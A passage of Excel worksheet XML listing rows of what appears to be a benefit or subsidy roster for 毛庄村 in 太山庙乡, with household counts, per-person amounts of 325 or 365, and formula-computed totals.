        <v>毛庄村</v>
      </c>
      <c r="D2086" s="23" t="s">
        <v>5541</v>
      </c>
      <c r="E2086" s="23" t="s">
        <v>3472</v>
      </c>
      <c r="F2086" s="24">
        <f>F2085</f>
        <v>4113210704</v>
      </c>
      <c r="G2086" s="24"/>
      <c r="H2086" s="24"/>
      <c r="I2086" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2086" s="24"/>
      <c r="K2086" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2087" customHeight="1" spans="1:11">
      <c r="A2087" s="23" t="s">
        <v>5542</v>
      </c>
      <c r="B2087" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2087" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2087" s="24" t="s">
        <v>5543</v>
      </c>
      <c r="E2087" s="24" t="s">
        <v>5544</v>
      </c>
      <c r="F2087" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2087" s="24">
        <v>2</v>
      </c>
      <c r="H2087" s="25">
        <v>325</v>
      </c>
      <c r="I2087" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2087" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2087" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2088" customHeight="1" spans="1:11">
      <c r="A2088" s="23" t="s">
        <v>5545</v>
      </c>
      <c r="B2088" s="24" t="str">
        <f>B2087</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2088" s="24" t="str">
        <f>C2087</f>
        <v>毛庄村</v>
      </c>
      <c r="D2088" s="23" t="s">
        <v>5546</v>
      </c>
      <c r="E2088" s="23" t="s">
        <v>3472</v>
      </c>
      <c r="F2088" s="24">
        <f>F2087</f>
        <v>4113210704</v>
      </c>
      <c r="G2088" s="24"/>
      <c r="H2088" s="24"/>
      <c r="I2088" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2088" s="24"/>
      <c r="K2088" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2089" customHeight="1" spans="1:11">
      <c r="A2089" s="23" t="s">
        <v>5547</v>
      </c>
      <c r="B2089" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2089" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2089" s="24" t="s">
        <v>5548</v>
      </c>
      <c r="E2089" s="24" t="s">
        <v>5549</v>
      </c>
      <c r="F2089" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2089" s="24">
        <v>1</v>
      </c>
      <c r="H2089" s="25">
        <v>365</v>
      </c>
      <c r="I2089" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2089" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2089" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2090" customHeight="1" spans="1:11">
      <c r="A2090" s="23" t="s">
        <v>5550</v>
      </c>
      <c r="B2090" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2090" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2090" s="24" t="s">
        <v>5551</v>
      </c>
      <c r="E2090" s="24" t="s">
        <v>5552</v>
      </c>
      <c r="F2090" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2090" s="24">
        <v>2</v>
      </c>
      <c r="H2090" s="25">
        <v>325</v>
      </c>
      <c r="I2090" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2090" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2090" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2091" customHeight="1" spans="1:11">
      <c r="A2091" s="23" t="s">
        <v>5553</v>
      </c>
      <c r="B2091" s="24" t="str">
        <f>B2090</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2091" s="24" t="str">
        <f>C2090</f>
        <v>毛庄村</v>
      </c>
      <c r="D2091" s="23" t="s">
        <v>5554</v>
      </c>
      <c r="E2091" s="23" t="s">
        <v>5015</v>
      </c>
      <c r="F2091" s="24">
        <f>F2090</f>
        <v>4113210704</v>
      </c>
      <c r="G2091" s="24"/>
      <c r="H2091" s="24"/>
      <c r="I2091" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2091" s="24"/>
      <c r="K2091" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2092" customHeight="1" spans="1:11">
      <c r="A2092" s="23" t="s">
        <v>5555</v>
      </c>
      <c r="B2092" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2092" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2092" s="24" t="s">
        <v>5556</v>
      </c>
      <c r="E2092" s="24" t="s">
        <v>5015</v>
      </c>
      <c r="F2092" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2092" s="24">
        <v>1</v>
      </c>
      <c r="H2092" s="25">
        <v>365</v>
      </c>
      <c r="I2092" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2092" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2092" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2093" customHeight="1" spans="1:11">
      <c r="A2093" s="23" t="s">
        <v>5557</v>
      </c>
      <c r="B2093" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2093" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2093" s="24" t="s">
        <v>5558</v>
      </c>
      <c r="E2093" s="24" t="s">
        <v>5493</v>
      </c>
      <c r="F2093" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2093" s="24">
        <v>2</v>
      </c>
      <c r="H2093" s="25">
        <v>325</v>
      </c>
      <c r="I2093" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2093" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2093" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2094" customHeight="1" spans="1:11">
      <c r="A2094" s="23" t="s">
        <v>5559</v>
      </c>
      <c r="B2094" s="24" t="str">
        <f>B2093</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2094" s="24" t="str">
        <f>C2093</f>
        <v>毛庄村</v>
      </c>
      <c r="D2094" s="23" t="s">
        <v>5560</v>
      </c>
      <c r="E2094" s="32" t="s">
        <v>5385</v>
      </c>
      <c r="F2094" s="24">
        <f>F2093</f>
        <v>4113210704</v>
      </c>
      <c r="G2094" s="24"/>
      <c r="H2094" s="24"/>
      <c r="I2094" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2094" s="24"/>
      <c r="K2094" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2095" customHeight="1" spans="1:11">
      <c r="A2095" s="23" t="s">
        <v>5561</v>
      </c>
      <c r="B2095" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2095" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2095" s="24" t="s">
        <v>5562</v>
      </c>
      <c r="E2095" s="24" t="s">
        <v>5563</v>
      </c>
      <c r="F2095" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2095" s="24">
        <v>2</v>
      </c>
      <c r="H2095" s="25">
        <v>325</v>
      </c>
      <c r="I2095" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2095" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2095" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2096" customHeight="1" spans="1:11">
      <c r="A2096" s="23" t="s">
        <v>5564</v>
      </c>
      <c r="B2096" s="24" t="str">
        <f>B2095</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2096" s="24" t="str">
        <f>C2095</f>
        <v>毛庄村</v>
      </c>
      <c r="D2096" s="23" t="s">
        <v>5565</v>
      </c>
      <c r="E2096" s="23" t="s">
        <v>5566</v>
      </c>
      <c r="F2096" s="24">
        <f>F2095</f>
        <v>4113210704</v>
      </c>
      <c r="G2096" s="24"/>
      <c r="H2096" s="24"/>
      <c r="I2096" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2096" s="24"/>
      <c r="K2096" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2097" customHeight="1" spans="1:11">
      <c r="A2097" s="23" t="s">
        <v>5567</v>
      </c>
      <c r="B2097" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2097" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2097" s="24" t="s">
        <v>5568</v>
      </c>
      <c r="E2097" s="24" t="s">
        <v>5563</v>
      </c>
      <c r="F2097" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2097" s="24">
        <v>1</v>
      </c>
      <c r="H2097" s="25">
        <v>365</v>
      </c>
      <c r="I2097" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2097" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2097" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2098" customHeight="1" spans="1:11">
      <c r="A2098" s="23" t="s">
        <v>5569</v>
      </c>
      <c r="B2098" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2098" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2098" s="24" t="s">
        <v>5570</v>
      </c>
      <c r="E2098" s="24" t="s">
        <v>3472</v>
      </c>
      <c r="F2098" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2098" s="24">
        <v>1</v>
      </c>
      <c r="H2098" s="25">
        <v>365</v>
      </c>
      <c r="I2098" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2098" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2098" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2099" customHeight="1" spans="1:11">
      <c r="A2099" s="23" t="s">
        <v>5571</v>
      </c>
      <c r="B2099" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2099" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2099" s="24" t="s">
        <v>5572</v>
      </c>
      <c r="E2099" s="24" t="s">
        <v>5400</v>
      </c>
      <c r="F2099" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2099" s="24">
        <v>1</v>
      </c>
      <c r="H2099" s="25">
        <v>365</v>
      </c>
      <c r="I2099" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2099" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2099" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2100" customHeight="1" spans="1:11">
      <c r="A2100" s="23" t="s">
        <v>5573</v>
      </c>
      <c r="B2100" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2100" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2100" s="24" t="s">
        <v>5574</v>
      </c>
      <c r="E2100" s="24" t="s">
        <v>5504</v>
      </c>
      <c r="F2100" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2100" s="24">
        <v>2</v>
      </c>
      <c r="H2100" s="25">
        <v>325</v>
      </c>
      <c r="I2100" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2100" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2100" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2101" customHeight="1" spans="1:11">
      <c r="A2101" s="23" t="s">
        <v>5575</v>
      </c>
      <c r="B2101" s="24" t="str">
        <f>B2100</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2101" s="24" t="str">
        <f>C2100</f>
        <v>毛庄村</v>
      </c>
      <c r="D2101" s="23" t="s">
        <v>5576</v>
      </c>
      <c r="E2101" s="23" t="s">
        <v>5520</v>
      </c>
      <c r="F2101" s="24">
        <f>F2100</f>
        <v>4113210704</v>
      </c>
      <c r="G2101" s="24"/>
      <c r="H2101" s="24"/>
      <c r="I2101" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2101" s="24"/>
      <c r="K2101" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2102" customHeight="1" spans="1:11">
      <c r="A2102" s="23" t="s">
        <v>5577</v>
      </c>
      <c r="B2102" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2102" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2102" s="24" t="s">
        <v>5578</v>
      </c>
      <c r="E2102" s="24" t="s">
        <v>5504</v>
      </c>
      <c r="F2102" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2102" s="24">
        <v>2</v>
      </c>
      <c r="H2102" s="25">
        <v>325</v>
      </c>
      <c r="I2102" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2102" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2102" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2103" customHeight="1" spans="1:11">
      <c r="A2103" s="23" t="s">
        <v>5579</v>
      </c>
      <c r="B2103" s="24" t="str">
        <f>B2102</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2103" s="24" t="str">
        <f>C2102</f>
        <v>毛庄村</v>
      </c>
      <c r="D2103" s="23" t="s">
        <v>5580</v>
      </c>
      <c r="E2103" s="23" t="s">
        <v>5015</v>
      </c>
      <c r="F2103" s="24">
        <f>F2102</f>
        <v>4113210704</v>
      </c>
      <c r="G2103" s="24"/>
      <c r="H2103" s="24"/>
      <c r="I2103" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2103" s="24"/>
      <c r="K2103" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2104" customHeight="1" spans="1:11">
      <c r="A2104" s="23" t="s">
        <v>5581</v>
      </c>
      <c r="B2104" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2104" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2104" s="24" t="s">
        <v>5582</v>
      </c>
      <c r="E2104" s="24" t="s">
        <v>2797</v>
      </c>
      <c r="F2104" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2104" s="24">
        <v>2</v>
      </c>
      <c r="H2104" s="25">
        <v>325</v>
      </c>
      <c r="I2104" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2104" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2104" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2105" customHeight="1" spans="1:11">
      <c r="A2105" s="23" t="s">
        <v>5583</v>
      </c>
      <c r="B2105" s="24" t="str">
        <f>B2104</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2105" s="24" t="str">
        <f>C2104</f>
        <v>毛庄村</v>
      </c>
      <c r="D2105" s="23" t="s">
        <v>5584</v>
      </c>
      <c r="E2105" s="23" t="s">
        <v>5585</v>
      </c>
      <c r="F2105" s="24">
        <f>F2104</f>
        <v>4113210704</v>
      </c>
      <c r="G2105" s="24"/>
      <c r="H2105" s="24"/>
      <c r="I2105" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2105" s="24"/>
      <c r="K2105" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2106" customHeight="1" spans="1:11">
      <c r="A2106" s="23" t="s">
        <v>5586</v>
      </c>
      <c r="B2106" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2106" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2106" s="24" t="s">
        <v>5587</v>
      </c>
      <c r="E2106" s="24" t="s">
        <v>5588</v>
      </c>
      <c r="F2106" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2106" s="24">
        <v>1</v>
      </c>
      <c r="H2106" s="25">
        <v>365</v>
      </c>
      <c r="I2106" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2106" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2106" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2107" customHeight="1" spans="1:11">
      <c r="A2107" s="23" t="s">
        <v>5589</v>
      </c>
      <c r="B2107" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2107" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2107" s="24" t="s">
        <v>5590</v>
      </c>
      <c r="E2107" s="24" t="s">
        <v>5374</v>
      </c>
      <c r="F2107" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2107" s="24">
        <v>1</v>
      </c>
      <c r="H2107" s="25">
        <v>365</v>
      </c>
      <c r="I2107" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2107" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2107" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2108" customHeight="1" spans="1:11">
      <c r="A2108" s="23" t="s">
        <v>5591</v>
      </c>
      <c r="B2108" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2108" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2108" s="24" t="s">
        <v>5592</v>
      </c>
      <c r="E2108" s="24" t="s">
        <v>5493</v>
      </c>
      <c r="F2108" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2108" s="24">
        <v>2</v>
      </c>
      <c r="H2108" s="25">
        <v>325</v>
      </c>
      <c r="I2108" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2108" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2108" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2109" customHeight="1" spans="1:11">
      <c r="A2109" s="23" t="s">
        <v>5593</v>
      </c>
      <c r="B2109" s="24" t="str">
        <f>B2108</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2109" s="24" t="str">
        <f>C2108</f>
        <v>毛庄村</v>
      </c>
      <c r="D2109" s="23" t="s">
        <v>5594</v>
      </c>
      <c r="E2109" s="23" t="s">
        <v>5486</v>
      </c>
      <c r="F2109" s="24">
        <f>F2108</f>
        <v>4113210704</v>
      </c>
      <c r="G2109" s="24"/>
      <c r="H2109" s="24"/>
      <c r="I2109" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2109" s="24"/>
      <c r="K2109" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2110" customHeight="1" spans="1:11">
      <c r="A2110" s="23" t="s">
        <v>5595</v>
      </c>
      <c r="B2110" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2110" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2110" s="24" t="s">
        <v>5596</v>
      </c>
      <c r="E2110" s="24" t="s">
        <v>5597</v>
      </c>
      <c r="F2110" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2110" s="24">
        <v>1</v>
      </c>
      <c r="H2110" s="25">
        <v>365</v>
      </c>
      <c r="I2110" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2110" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2110" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2111" customHeight="1" spans="1:11">
      <c r="A2111" s="23" t="s">
        <v>5598</v>
      </c>
      <c r="B2111" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2111" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2111" s="24" t="s">
        <v>5599</v>
      </c>
      <c r="E2111" s="24" t="s">
        <v>5422</v>
      </c>
      <c r="F2111" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2111" s="24">
        <v>1</v>
      </c>
      <c r="H2111" s="25">
        <v>365</v>
      </c>
      <c r="I2111" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2111" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2111" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2112" customHeight="1" spans="1:11">
      <c r="A2112" s="23" t="s">
        <v>5600</v>
      </c>
      <c r="B2112" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2112" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2112" s="24" t="s">
        <v>5601</v>
      </c>
      <c r="E2112" s="24" t="s">
        <v>5602</v>
      </c>
      <c r="F2112" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2112" s="24">
        <v>1</v>
      </c>
      <c r="H2112" s="25">
        <v>365</v>
      </c>
      <c r="I2112" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2112" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2112" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2113" customHeight="1" spans="1:11">
      <c r="A2113" s="23" t="s">
        <v>5604</v>
      </c>
      <c r="B2113" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2113" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2113" s="24" t="s">
        <v>5605</v>
      </c>
      <c r="E2113" s="24" t="s">
        <v>5403</v>
      </c>
      <c r="F2113" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2113" s="24">
        <v>2</v>
      </c>
      <c r="H2113" s="25">
        <v>325</v>
      </c>
      <c r="I2113" s="24">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J2113" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2113" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2114" customHeight="1" spans="1:11">
      <c r="A2114" s="23" t="s">
        <v>5606</v>
      </c>
      <c r="B2114" s="24" t="str">
        <f>B2113</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2114" s="24" t="str">
        <f>C2113</f>
        <v>毛庄村</v>
      </c>
      <c r="D2114" s="30" t="s">
        <v>5607</v>
      </c>
      <c r="E2114" s="30" t="s">
        <v>3251</v>
      </c>
      <c r="F2114" s="24">
        <f>F2113</f>
        <v>4113210704</v>
      </c>
      <c r="G2114" s="24"/>
      <c r="H2114" s="24"/>
      <c r="I2114" s="24">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="J2114" s="24"/>
      <c r="K2114" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2115" customHeight="1" spans="1:11">
      <c r="A2115" s="23" t="s">
        <v>5608</v>
      </c>
      <c r="B2115" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2115" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2115" s="24" t="s">
        <v>5609</v>
      </c>
      <c r="E2115" s="24" t="s">
        <v>5610</v>
      </c>
      <c r="F2115" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2115" s="24">
        <v>1</v>
      </c>
      <c r="H2115" s="25">
        <v>365</v>
      </c>
      <c r="I2115" s="24">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J2115" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2115" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2116" customHeight="1" spans="1:11">
      <c r="A2116" s="23" t="s">
        <v>5611</v>
      </c>
      <c r="B2116" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2116" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2116" s="24" t="s">
        <v>5612</v>
      </c>
      <c r="E2116" s="24" t="s">
        <v>5486</v>
      </c>
      <c r="F2116" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2116" s="24">
        <v>1</v>
      </c>
      <c r="H2116" s="25">
        <v>365</v>
      </c>
      <c r="I2116" s="24">
        <f t="shared" ref="I2116:I2179" si="33">H2116*G2116</f>
        <v>365</v>
      </c>
      <c r="J2116" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2116" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2117" customHeight="1" spans="1:11">
      <c r="A2117" s="23" t="s">
        <v>5613</v>
      </c>
      <c r="B2117" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2117" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2117" s="24" t="s">
        <v>5614</v>
      </c>
      <c r="E2117" s="24" t="s">
        <v>5414</v>
      </c>
      <c r="F2117" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2117" s="24">
        <v>2</v>
      </c>
      <c r="H2117" s="25">
        <v>325</v>
      </c>
      <c r="I2117" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2117" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2117" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2118" customHeight="1" spans="1:11">
      <c r="A2118" s="23" t="s">
        <v>5615</v>
      </c>
      <c r="B2118" s="24" t="str">
        <f>B2117</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2118" s="24" t="str">
        <f>C2117</f>
        <v>毛庄村</v>
      </c>
      <c r="D2118" s="23" t="s">
        <v>5616</v>
      </c>
      <c r="E2118" s="23" t="s">
        <v>5479</v>
      </c>
      <c r="F2118" s="24">
        <f>F2117</f>
        <v>4113210704</v>
      </c>
      <c r="G2118" s="24"/>
      <c r="H2118" s="24"/>
      <c r="I2118" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2118" s="24"/>
      <c r="K2118" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2119" customHeight="1" spans="1:11">
      <c r="A2119" s="23" t="s">
        <v>5617</v>
      </c>
      <c r="B2119" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2119" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2119" s="24" t="s">
        <v>5618</v>
      </c>
      <c r="E2119" s="24" t="s">
        <v>5619</v>
      </c>
      <c r="F2119" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2119" s="24">
        <v>2</v>
      </c>
      <c r="H2119" s="25">
        <v>325</v>
      </c>
      <c r="I2119" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2119" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2119" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2120" customHeight="1" spans="1:11">
      <c r="A2120" s="23" t="s">
        <v>5620</v>
      </c>
      <c r="B2120" s="24" t="str">
        <f>B2119</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2120" s="24" t="str">
        <f>C2119</f>
        <v>毛庄村</v>
      </c>
      <c r="D2120" s="23" t="s">
        <v>5621</v>
      </c>
      <c r="E2120" s="23" t="s">
        <v>5460</v>
      </c>
      <c r="F2120" s="24">
        <f>F2119</f>
        <v>4113210704</v>
      </c>
      <c r="G2120" s="24"/>
      <c r="H2120" s="24"/>
      <c r="I2120" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2120" s="24"/>
      <c r="K2120" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2121" customHeight="1" spans="1:11">
      <c r="A2121" s="23" t="s">
        <v>5622</v>
      </c>
      <c r="B2121" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2121" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2121" s="24" t="s">
        <v>5623</v>
      </c>
      <c r="E2121" s="24" t="s">
        <v>5470</v>
      </c>
      <c r="F2121" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2121" s="24">
        <v>2</v>
      </c>
      <c r="H2121" s="25">
        <v>325</v>
      </c>
      <c r="I2121" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2121" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2121" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2122" customHeight="1" spans="1:11">
      <c r="A2122" s="23" t="s">
        <v>5624</v>
      </c>
      <c r="B2122" s="24" t="str">
        <f>B2121</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2122" s="24" t="str">
        <f>C2121</f>
        <v>毛庄村</v>
      </c>
      <c r="D2122" s="23" t="s">
        <v>5625</v>
      </c>
      <c r="E2122" s="23" t="s">
        <v>3251</v>
      </c>
      <c r="F2122" s="24">
        <f>F2121</f>
        <v>4113210704</v>
      </c>
      <c r="G2122" s="24"/>
      <c r="H2122" s="24"/>
      <c r="I2122" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2122" s="24"/>
      <c r="K2122" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2123" customHeight="1" spans="1:11">
      <c r="A2123" s="23" t="s">
        <v>5626</v>
      </c>
      <c r="B2123" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2123" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2123" s="24" t="s">
        <v>5627</v>
      </c>
      <c r="E2123" s="24" t="s">
        <v>5619</v>
      </c>
      <c r="F2123" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2123" s="24">
        <v>2</v>
      </c>
      <c r="H2123" s="25">
        <v>325</v>
      </c>
      <c r="I2123" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2123" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2123" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2124" customHeight="1" spans="1:11">
      <c r="A2124" s="23" t="s">
        <v>5628</v>
      </c>
      <c r="B2124" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2124" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2124" s="24" t="s">
        <v>5629</v>
      </c>
      <c r="E2124" s="24" t="s">
        <v>5374</v>
      </c>
      <c r="F2124" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2124" s="24"/>
      <c r="I2124" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2124" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2124" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2125" customHeight="1" spans="1:11">
      <c r="A2125" s="23" t="s">
        <v>5630</v>
      </c>
